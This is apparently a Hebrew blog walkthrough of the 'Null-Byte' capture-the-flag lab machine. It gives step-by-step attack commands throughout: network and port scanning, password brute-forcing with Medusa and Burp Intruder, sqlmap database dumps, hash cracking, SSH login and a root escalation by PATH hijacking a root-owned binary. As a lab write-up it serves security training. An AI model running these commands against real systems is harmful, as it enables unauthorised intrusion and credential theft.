דו"ח Null-Byte
1. יש למצוא את המכונה ברשת בעזרת arp-scan 172.16.0.0/16 ולהוסיף אותה לטווח בתוכנת ה-Burp.
2. יש להריץ ספיידר בתוכנת ה-Burp, ולהתחיל סריקות באמצעות Nikto ו-Nmap.
3. סריקה באמצעות Nmap: 
nmap –p- -sV 172.16.0.13
Not shown: 65531 closed ports PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.4.10 ((Debian)) 111/tcp open rpcbind 2-4 (RPC #100000) 777/tcp open ssh OpenSSH 6.7p1 Debian 5 (protocol 2.0) 50927/tcp open status 1 (RPC #100024) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel port 22 is forwarded to 777 instead.
* יש לשים לב שפורט 22 (SSH) הועבר לפורט 777 במקום.



4. סריקה באמצעות Nikto:
nikto –h 172.16.0.13 Server: Apache/2.4.10 (Debian) + No CGI Directories found (use '-C all' to force check all possible dirs) + ETag header found on server, fields: 0xc4 0x51c42a5c32a70 + Allowed HTTP Methods: POST, OPTIONS, GET, HEAD + OSVDB-3233: /icons/README: Apache default file found. + /phpmyadmin/: phpMyAdmin directory found + 6456 items checked: 0 error(s) and 4 item(s) reported on remote host

4. הרצת Dirbuster למציאת תיקיות נוספות:


5. ננסה למצוא מידע נוסף, ניתן להסתיר מחרוזות מאחורי תמונה. נוריד את התמונה הראשית ונבדוק אותה באמצעות הפקודה strings:
strings man.gif
* כפי שניתן לראות בתוך התמונה יש מחרוזת כלשהי: kzMb5nVYJw.

* ננסה לגשת אליה באמצעות הדפדפן: http://172.16.0.13/kzMb5nVYJw

6. כפי שניתן לראות, המחרוזת היא כתובת של דף, נבדוק את הקוד שלו:
<center>
<form method="post" action="index.php">
Key:<br>
<input type="password" name="key">
</form>
</center>
<!-- this form isn't connected to mysql, password ain't that complex --!>


7. לאחר מספר ניחושים, אין אפשרות לאתר את הסיסמא, יש למצוא את הדף בתוכנת ה-Burp ולשלוח אותו אל ה-Intruder (ניתן לעשות זאת גם באמצעות Ctrl+I) נוסיף מילון סיסמאות כמו Rockyou או Crackstation ונתחיל בתקיפה.





* ניתן גם להשתמש ב-Hydra או Medusa כדי לפרוץ את הסיסמא.

8. הסיסא היא: elite


9. נתתחבר עם הסיסמא שברשותינו.
10. מכיוון שאין לנו שם משתמש ננסה להיכנס ללא שם משתמש. (יש 2 משתמשים):
ramses
isis


כעת, לאחר שיש מידע על המשתמשים יש לפרוץ אותם. ניתן לעשות זאת ב-2 דרכים:

1. באמצעות Brute Force:
medusa -u isis -P rockyou.txt -h 172.16.0.13 -M ssh -n 777
medusa -u ramses -P rockyou.txt -h 172.16.0.13 -M ssh -n 777

2. באמצעות SQLMAP:
sqlmap -u http://172.16.0.13/kzMb5nVYJw/420search.php?usrtosearch= --dbs


11. נבדוק את מסד הנתונים שנקרא mysql:
sqlmap –u http://172.16.0.13/kzMb5nVYJw/420search.php?usrtosearch= --batch  --dump -C User,Password -T user -D mysql



12. יש לנו את הסיסמא לאפליקציה המותקנת, ניגש ונבדוק אותה.

13. נבדוק את מסד הנתונים שנקרא seth ואת טבלת המשתמשים שבו.
sqlmap -u http://172.16.0.13/kzMb5nVYJw/420search.php?usrtosearch=1 --dump --columns --tables -D seth



* הסיסמא מקודדת בפורמט Base64:
echo YzZkNmJkN2ViZjgwNmY0M2M3NmFjYzM2ODE3MDNiODE= |base64 –d

* התוצאה היא: c6d6bd7ebf806f43c76acc3681703b81.
זוהי תוצאה מגובבת בפורמט MD5.
באמצעות מספר כלים (Hashcat, John, Crackstation) נחפש את התוצאה.
נגלה שהסיסמא היא:
omega.


14. התחברות באמצעות SSH בפורט 777 כפי שגילינו ב-NMAP.
ssh ramses@172.16.0.13 –p 777
User ramses, Password omega


15. התחבר! נחפש מידע שעשוי לעזור לנו להתקדם.
ramses@NullByte:~$ ls -lha
drwxr-xr-x 2 ramses ramses 4.0K Aug  2  2015 .
drwxr-xr-x 5 root   root   4.0K Aug  2  2015 ..
-rw------- 1 ramses ramses   96 Aug  2  2015 .bash_history
-rw-r--r-- 1 ramses ramses  220 Aug  2  2015 .bash_logout
-rw-r--r-- 1 ramses ramses 3.5K Aug  2  2015 .bashrc
-rw-r--r-- 1 ramses ramses  675 Aug  2  2015 .profile

16. נבדוק את תוכן הקבצים שנמצאו. יש מידע חשוב בקובץ bash_history.

su eric
exit
ls
clear
cd /var/www
cd backup/
ls
./procwatch 
clear
sudo -s
cd /
ls
exit

* ניתן להבחין שמשתמש בשם eric ביצע מספר פעולות במשתמש הנוכחי.
ניגש אל הנתיב /var/www/backup/ ונבדוק מהו procwatch.

* הקובץ הנ"ל נמצא בבעלות root משמעות הדבר שהוא רץ בהרשאות גבוהות.


17. נריץ את הקובץ, כפי שניתן לראות הקובץ מריץ 2 קבצים.
ps
sh

18. ניצור קובץ ps חדש וניתן לו הרשאות.
echo /bin/sh > ps
chmod +x ps

19. ניצור קובץ sh חדש וניתן לו הרשאות.
Create a new sh file echo /bin/sh > sh chmod +x sh

* נגדיר נתיב חדש.
export PATH=/var/www/backup:${PATH}

* נריץ את הקובץ בשנית, ואנחנו root!


20. נחפש מספר דגלים והוכחות בתיקיית /root/


Share To:

פאביו ליאור רחמים

Post A Comment: